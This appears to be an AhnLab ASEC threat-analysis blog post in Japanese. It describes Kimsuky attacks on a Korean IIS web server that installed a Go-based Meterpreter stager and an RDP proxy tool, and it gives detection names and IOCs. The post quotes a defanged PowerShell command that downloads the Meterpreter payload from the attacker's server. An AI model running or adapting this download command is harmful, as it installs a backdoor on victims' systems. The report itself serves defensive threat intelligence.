AhnLab Security Emergency response Center(ASEC)では最近、Kimsuky 攻撃グループが Web サーバーを対象にマルウェアを配布していることを確認した。Kimsuky は北朝鮮のサポートを受けていることが分かっている脅威グループであり、2013年から活動を続けている。初期には韓国の北朝鮮と関連した研究機関等への攻撃を行っており、2014年には、韓国のエネルギー機関への攻撃を行った。2017年以降は、韓国以外の他の国への攻撃も行っている。[1]
ASEC ではブログを通して Kimsuky グループの様々な攻撃事例を解析および公開しており、主にメールに MS Office ドキュメントファイルや[2] OneNote [3]、CHM [4]のような不正なファイルを添付する方式のスピアフィッシング攻撃について取り扱ってきた。Kimsuky グループの攻撃事例は、主に上記のスピアフィッシングのような社会工学的な攻撃方式が使用されるが、ここでは Web サーバーを対象とする攻撃事例を取り扱う。Kimsuky は攻撃に成功した後、Metasploit Meterpreter バックドアマルウェアをインストールしており、それ以外にも Go 言語で開発された Proxy マルウェアをインストールした履歴も確認できる。
1. IIS Web サーバーを対象にした攻撃事例
攻撃対象となった場所は、韓国国内の建築事務所の Windows IIS Web サーバーで、脆弱性がパッチされていなかったり、不適切に管理されていたものと推定される。攻撃者は IIS Web サーバーを攻撃し、PowerShell コマンドを実行した。以下は当社の AhnLab Smart Defense(ASD) のログである。Windows IIS Web サーバープロセスである w3wp.exe が PowerShell を利用して、外部から追加のペイロードをダウンロードすることを確認できる。
実行された PowerShell コマンドは以下の通りであり、ダウンロードされたファイルである「img.dat」は Metasploit Meterpreter というバックドア型マルウェアである。
> powershell.exe invoke-webrequest -uri “hxxp://45.58.52[.]82/up.dat” -outfile “c:\programdata\img.dat”
攻撃者はその後 Metasploit を利用して、Proxy マルウェアを追加でインストールしており、ここでもPowerShell コマンドが使用されていた。
2. Meterpreter マルウェア
Metasploit はペネトレーションテストを目的としたフレームワークである。企業や機関のネットワーク、およびシステムに対するセキュリティの脆弱性をチェックする目的で使用可能なツールとして、ペネトレーションテストの各段階別に様々な機能をサポートしている。Meterpreter は Metasploit から提供されているバックドア型マルウェアであり、攻撃者のコマンドを受けて、様々な不正な振る舞いを実行できる。
オープンソースである Metasploit は、アクセシビリティが良いことから様々な攻撃者によって使用されているが、これは Kimsuky グループも同じである。以前 ASEC でも、Kimsuky グループが Meterpreter を AppleSeed マルウェアと共に攻撃に使用された事例を紹介したことがある。[5]
攻撃に使用された C&C アドレスが、以前から Kimsuky グループによって使用されている点、また regsvr32.exe プロセスによってマルウェアを実行するという点も、Kimsuky グループが以前から使用してきた方式と同じである。攻撃に使用されたマルウェアは DLL フォーマットであり、regsvr32.exe プロセスにロードされて動作する。
従来と異なる点があるとすれば、Meterpreter の Stager マルウェアが Go 言語で開発されているところである。Kimsuky グループは、以前は自主制作した形態、もしくはこれを VMProtect のようなパッカーでパックした後、Meterpreter Stager を配布していた。後述で扱う Proxy マルウェアもまた Go 言語で開発されたところを見ると、最近は検知を回避するため、マルウェアを配布をする時は、Go 言語で開発しているものと推定される。
3. Proxy (GoLang) マルウェア
Meterpreter はその後、攻撃者のコマンドを受けて PowerShell コマンドを実行し、追加のマルウェアをインストールしていた。Powershell コマンドを通してダウンロードされたマルウェアは Proxy 機能を担うマルウェアである。Kimsuky グループは以前から攻撃プロセスで Proxy マルウェアを利用している。このマルウェアだけの特徴と言えば、以前とは異なり、Go 言語で開発されたという点である。
今回の攻撃に使用された Proxy マルウェアは以下のようなコマンドライン引数で2つの IP アドレスおよびポート番号を渡され、中継する役割を担う。以前の Proxy ツールと異なる点は、通信プロセスの検証に使用されるものと推定されるシグネチャとして「aPpLe」という文字列が使用されるという点である。そしてマルウェアを実行すると、「127.0.0.1:3389」という RDP ポートが例として使用されることを通して攻撃者の Proxy マルウェアの使用目的が、今後感染システムに RDP 接続するためのものであると推定できる。
4. 結論
最近、Windows IIS Web サーバーを対象とする Kimsuky グループの攻撃活動が確認された。ログを通じて推定すると、Kimsuky グループは不適切に管理されていたり、脆弱性がパッチされていない Web サーバーを攻撃したものと推定される。その後、Meterpreter をインストールして Web サーバーの操作権限を獲得していた。
サーバー管理者はサーバー構成環境が脆弱である場合は最新バージョンのパッチを適用し、既知の脆弱性による被害を事前に防止しなければならない。また、外部に開放されているサーバーの場合、セキュリティ製品を利用して、部外者からのアクセスを制限する必要がある。また、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。
ファイル検知
– Backdoor/Win.Meterpreter.C5427507 (2023.05.15.02)
– HackTool/Win.Proxy.C5427508 (2023.05.15.02)
IOC
MD5
– 000130a373ea4085b87b97a0c7000c86 : Meterpreter (img.dat)
– 6b2062e61bcb46ce5ff19b329ce31b03 : Proxy マルウェア(cl.exe)
ダウンロードアドレス
– hxxp://45.58.52[.]82/up.dat : Meterpreter
– hxxp://45.58.52[.]82/cl.exe : Proxy マルウェア
C&C アドレス
– 45.58.52[.]82:8443 : Meterpreter
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報